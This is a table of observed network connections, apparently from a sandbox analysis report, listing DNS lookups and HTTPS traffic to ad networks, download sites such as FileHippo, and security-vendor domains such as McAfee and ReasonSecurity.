| GB | 142.250.200.10:443 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | 31.236.74.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| GB | 216.58.204.70:443 | s0.2mdn.net | udp |
| US | 8.8.8.8:53 | pubads.g.doubleclick.net | udp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | udp |
| ES | 172.217.17.3:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 8.8.8.8:53 | eus.rubiconproject.com | udp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| US | 8.8.8.8:53 | ms-cookie-sync.presage.io | udp |
| GB | 2.21.188.239:443 | ads.pubmatic.com | tcp |
| US | 172.64.149.180:443 | js-sec.indexww.com | tcp |
| BE | 23.55.98.169:443 | eus.rubiconproject.com | tcp |
| US | 151.101.129.108:443 | acdn.adnxs.com | tcp |
| IE | 34.249.60.124:443 | ms-cookie-sync.presage.io | tcp |
| IE | 34.249.60.124:443 | ms-cookie-sync.presage.io | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 8.8.8.8:53 | 108.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.60.249.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | token.rubiconproject.com | udp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | cdn.indexww.com | udp |
| US | 8.8.8.8:53 | d3419h2vl8o3m4.cloudfront.net | udp |
| GB | 18.172.155.204:443 | d3419h2vl8o3m4.cloudfront.net | tcp |
| GB | 18.172.155.204:443 | d3419h2vl8o3m4.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 204.155.172.18.in-addr.arpa | udp |
| GB | 18.172.155.204:443 | d3419h2vl8o3m4.cloudfront.net | tcp |
| GB | 18.172.155.204:443 | d3419h2vl8o3m4.cloudfront.net | tcp |
| US | 8.8.8.8:53 | sc.filehippo.net | udp |
| US | 23.219.230.135:443 | sc.filehippo.net | tcp |
| US | 8.8.8.8:53 | m.media-amazon.com | udp |
| US | 151.101.1.16:443 | m.media-amazon.com | tcp |
| US | 151.101.1.16:443 | m.media-amazon.com | udp |
| US | 8.8.8.8:53 | ts.amazon-adsystem.com | udp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | connatix-d.openx.net | udp |
| GB | 18.245.218.37:443 | ts.amazon-adsystem.com | tcp |
| IE | 52.95.115.196:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 35.244.159.8:443 | connatix-d.openx.net | udp |
| US | 8.8.8.8:53 | s2.paa-reporting-advertising.amazon | udp |
| GB | 54.192.137.67:443 | s2.paa-reporting-advertising.amazon | tcp |
| US | 8.8.8.8:53 | assets.connatix.com | udp |
| GB | 108.156.39.62:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| US | 8.8.8.8:53 | 16.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.218.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.137.192.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dl5.filehippo.com | udp |
| US | 151.101.193.91:443 | dl5.filehippo.com | tcp |
| US | 8.8.8.8:53 | 91.193.101.151.in-addr.arpa | udp |
| IE | 52.95.115.196:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | cds.connatix.com | udp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | udp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | udp |
| GB | 18.245.218.37:443 | ts.amazon-adsystem.com | tcp |
| GB | 18.245.218.37:443 | ts.amazon-adsystem.com | tcp |
| GB | 18.245.218.37:443 | ts.amazon-adsystem.com | tcp |
| ES | 172.217.17.3:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | m.media-amazon.com | udp |
| GB | 18.244.122.174:443 | m.media-amazon.com | udp |
| US | 8.8.8.8:53 | 174.122.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | udp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | udp |
| ES | 172.217.17.3:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 2.19.252.146:443 | aefd.nelreports.net | udp |
| GB | 18.244.140.6:443 | shield.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | d3419h2vl8o3m4.cloudfront.net | udp |
| GB | 18.172.155.189:443 | d3419h2vl8o3m4.cloudfront.net | tcp |
| GB | 18.172.155.189:443 | d3419h2vl8o3m4.cloudfront.net | tcp |
| GB | 18.244.140.6:443 | shield.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | 6.140.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.155.172.18.in-addr.arpa | udp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | udp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 142.250.72.163:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | analytics.apis.mcafee.com | udp |
| US | 35.155.69.169:443 | analytics.apis.mcafee.com | tcp |
| US | 8.8.8.8:53 | 163.72.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.69.155.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sadownload.mcafee.com | udp |
| US | 2.20.12.102:443 | sadownload.mcafee.com | tcp |
| US | 8.8.8.8:53 | track.analytics-data.io | udp |
| US | 8.8.8.8:53 | 102.12.20.2.in-addr.arpa | udp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 8.8.8.8:53 | update.reasonsecurity.com | udp |
| GB | 18.154.84.124:443 | update.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | electron-shell.reasonsecurity.com | udp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| GB | 108.156.46.38:443 | electron-shell.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | 161.21.208.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.84.154.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.46.156.108.in-addr.arpa | udp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 2.20.12.102:443 | sadownload.mcafee.com | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 8.8.8.8:53 | home.mcafee.com | udp |
| BE | 104.68.84.174:443 | home.mcafee.com | tcp |
| US | 35.155.69.169:443 | analytics.apis.mcafee.com | tcp |
| US | 8.8.8.8:53 | 174.84.68.104.in-addr.arpa | udp |
| US | 35.155.69.169:443 | analytics.apis.mcafee.com | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 8.8.8.8:53 | cdn.reasonsecurity.com | udp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| GB | 52.84.90.44:443 | cdn.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | 44.90.84.52.in-addr.arpa | udp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 8.8.8.8:53 | capi.connatix.com | udp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 158.33.239.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 23.55.97.181:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 181.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sadownload.mcafee.com | udp |
| US | 2.20.12.102:443 | sadownload.mcafee.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 8.8.8.8:53 | ts.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | m.media-amazon.com | udp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| GB | 18.245.218.86:443 | ts.amazon-adsystem.com | tcp |
| GB | 18.165.198.31:443 | m.media-amazon.com | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 8.8.8.8:53 | 31.198.165.18.in-addr.arpa | udp |
| GB | 54.192.137.102:443 | s2.paa-reporting-advertising.amazon | tcp |
| US | 8.8.8.8:53 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | udp |
| GB | 108.156.39.33:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 8.8.8.8:53 | track.analytics-data.io | udp |
| US | 34.238.47.185:443 | track.analytics-data.io | tcp |
| US | 8.8.8.8:53 | 102.137.192.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.47.238.34.in-addr.arpa | udp |
| SE | 192.229.221.95:80 | cacerts.rapidssl.com | tcp |
| GB | 18.165.198.31:443 | m.media-amazon.com | tcp |
| US | 8.8.8.8:53 | config.reasonsecurity.com | udp |
| GB | 99.86.114.75:443 | config.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | 75.114.86.99.in-addr.arpa | udp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 23.55.97.181:80 | www.microsoft.com | tcp |
| US | 172.64.146.152:443 | capi.connatix.com | tcp |
| US | 8.8.8.8:53 | 74.19.199.152.in-addr.arpa | udp |
| US | 172.64.146.152:443 | capi.connatix.com | tcp |
| US | 8.8.8.8:53 | sf.symcd.com | udp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 152.199.19.74:80 | sf.symcd.com | tcp |
| US | 152.199.19.74:80 | sf.symcd.com | tcp |
| US | 8.8.8.8:53 | crl.thawte.com | udp |
| SE | 192.229.221.95:80 | crl.thawte.com | tcp |
| US | 8.8.8.8:53 | api.reasonsecurity.com | udp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 34.238.47.185:443 | track.analytics-data.io | tcp |
| US | 8.8.8.8:53 | 235.0.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mc6.reasonsecurity.com | udp |
| US | 52.43.110.0:443 | mc6.reasonsecurity.com | tcp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 18.165.198.31:443 | m.media-amazon.com | tcp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | udp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | udp |
| US | 142.250.72.163:443 | csi.gstatic.com | udp |
| GB | 18.245.218.86:443 | ts.amazon-adsystem.com | tcp |
| GB | 54.192.137.102:443 | s2.paa-reporting-advertising.amazon | tcp |
| GB | 108.156.39.33:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| US | 8.8.8.8:53 | 0.110.43.52.in-addr.arpa | udp |
| GB | 52.84.90.44:443 | cdn.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | cdn.reasonsecurity.com | udp |
| US | 8.8.8.8:53 | cdn.reasonsecurity.com | udp |
| GB | 52.84.90.87:443 | cdn.reasonsecurity.com | tcp |
| GB | 52.84.90.87:443 | cdn.reasonsecurity.com | tcp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 87.90.84.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 204.79.197.239:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedgeextensions.b.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 87.248.204.0:80 | msedgeextensions.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 239.197.79.204.in-addr.arpa | udp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 8.8.8.8:53 | track.analytics-data.io | udp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 18.208.21.161:443 | track.analytics-data.io | tcp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| GB | 18.245.218.86:443 | ts.amazon-adsystem.com | tcp |
| GB | 18.165.198.31:443 | m.media-amazon.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 54.192.137.102:443 | s2.paa-reporting-advertising.amazon | tcp |
| GB | 108.156.39.33:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| US | 8.8.8.8:53 | 232.226.220.67.in-addr.arpa | udp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 18.165.198.31:443 | m.media-amazon.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | edr-api.reasonlabsapi.com | udp |
| GB | 143.204.176.113:443 | edr-api.reasonlabsapi.com | tcp |
| US | 34.238.47.185:443 | track.analytics-data.io | tcp |
| US | 8.8.8.8:53 | 113.176.204.143.in-addr.arpa | udp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | udp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | m.media-amazon.com | udp |
| GB | 18.154.87.195:443 | m.media-amazon.com | tcp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | udp |
| US | 142.250.72.163:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | 195.87.154.18.in-addr.arpa | udp |
| GB | 18.245.218.76:443 | ts.amazon-adsystem.com | tcp |
| GB | 18.245.218.76:443 | ts.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 76.218.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s2.paa-reporting-advertising.amazon | udp |
| GB | 54.192.137.102:443 | s2.paa-reporting-advertising.amazon | tcp |
| US | 8.8.8.8:53 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | udp |
| GB | 54.192.137.102:443 | s2.paa-reporting-advertising.amazon | tcp |
| GB | 108.156.39.71:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| GB | 54.192.137.102:443 | s2.paa-reporting-advertising.amazon | tcp |
| GB | 108.156.39.71:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| US | 8.8.8.8:53 | 71.39.156.108.in-addr.arpa | udp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| US | 8.8.8.8:53 | cds.connatix.com | udp |
| GB | 18.245.218.76:443 | ts.amazon-adsystem.com | tcp |
| GB | 18.154.87.195:443 | m.media-amazon.com | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 54.192.137.102:443 | s2.paa-reporting-advertising.amazon | tcp |
| GB | 108.156.39.71:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 18.154.87.195:443 | m.media-amazon.com | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 66.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 104.18.41.104:443 | cds.connatix.com | tcp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | www.smartgaga.com | udp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | sw.symcd.com | udp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 152.199.19.74:80 | sw.symcd.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 104.18.41.104:443 | cds.connatix.com | tcp |
| GB | 18.154.87.195:443 | m.media-amazon.com | tcp |
| US | 8.8.8.8:53 | ox-rtb-europe-west2.openx.net | udp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | udp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | udp |
| US | 142.250.72.163:443 | csi.gstatic.com | udp |
| GB | 18.245.218.76:443 | ts.amazon-adsystem.com | tcp |
| GB | 54.192.137.102:443 | s2.paa-reporting-advertising.amazon | tcp |
| GB | 108.156.39.71:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 104.18.41.104:443 | cds.connatix.com | tcp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 104.18.41.104:443 | cds.connatix.com | tcp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 104.18.41.104:443 | cds.connatix.com | tcp |
| GB | 18.245.218.76:443 | ts.amazon-adsystem.com | tcp |
| GB | 18.245.218.76:443 | ts.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | s2.paa-reporting-advertising.amazon | udp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 54.192.137.67:443 | s2.paa-reporting-advertising.amazon | tcp |
| US | 8.8.8.8:53 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | udp |
| GB | 108.156.39.97:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| US | 8.8.8.8:53 | 97.39.156.108.in-addr.arpa | udp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | www.wireshark.org | udp |
| US | 104.26.10.240:443 | www.wireshark.org | tcp |
| SE | 192.229.221.95:80 | crl.thawte.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | m.media-amazon.com | udp |
| US | 8.8.8.8:53 | 240.10.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| GB | 18.244.122.174:443 | m.media-amazon.com | tcp |
| N/A | 127.0.0.1:5037 | tcp | |
| US | 104.18.41.104:443 | cds.connatix.com | tcp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | udp |
| US | 8.8.8.8:53 | pubads.g.doubleclick.net | udp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | tcp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | udp |
| US | 104.18.41.104:443 | cds.connatix.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 67.220.228.203:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| GB | 18.244.122.174:443 | m.media-amazon.com | tcp |
| US | 8.8.8.8:53 | capi.connatix.com | udp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 52.95.122.74:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 52.95.122.74:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 18.245.218.76:443 | ts.amazon-adsystem.com | tcp |
| GB | 54.192.137.67:443 | s2.paa-reporting-advertising.amazon | tcp |
| GB | 108.156.39.97:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| IE | 52.95.122.74:443 | aax-eu.amazon-adsystem.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| IE | 52.95.122.74:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 142.250.72.163:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| NL | 23.62.61.194:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.194:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | www.elevenforum.com | udp |
| US | 104.26.9.212:443 | www.elevenforum.com | tcp |
| US | 104.26.9.212:443 | www.elevenforum.com | tcp |
| US | 8.8.8.8:53 | cdn.fuseplatform.net | udp |
| US | 8.8.8.8:53 | 212.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | support.microsoft.com | udp |
| BE | 23.14.90.90:443 | cdn.fuseplatform.net | tcp |
| BE | 23.55.96.117:443 | support.microsoft.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 90.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.96.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| BE | 23.14.90.90:443 | cdn.fuseplatform.net | tcp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | cmp.inmobi.com | udp |
| GB | 18.244.114.102:443 | cmp.inmobi.com | tcp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | udp |
| GB | 52.84.90.106:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | 102.114.244.18.in-addr.arpa | udp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | api.cmp.inmobi.com | udp |
| DE | 54.93.106.56:443 | api.cmp.inmobi.com | tcp |
| DE | 54.93.106.56:443 | api.cmp.inmobi.com | tcp |
| US | 104.26.9.212:443 | www.elevenforum.com | tcp |
| US | 8.8.8.8:53 | 70.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.106.93.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | i.connectad.io | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| DE | 162.19.138.120:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | prebid.a-mo.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | g2.gumgum.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | fastlane.rubiconproject.com | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| NL | 185.89.210.153:443 | ib.adnxs.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| NL | 89.149.193.113:443 | prg-apac.smartadserver.com | tcp |
| NL | 89.149.193.113:443 | prg-apac.smartadserver.com | tcp |
| NL | 89.149.193.113:443 | prg-apac.smartadserver.com | tcp |
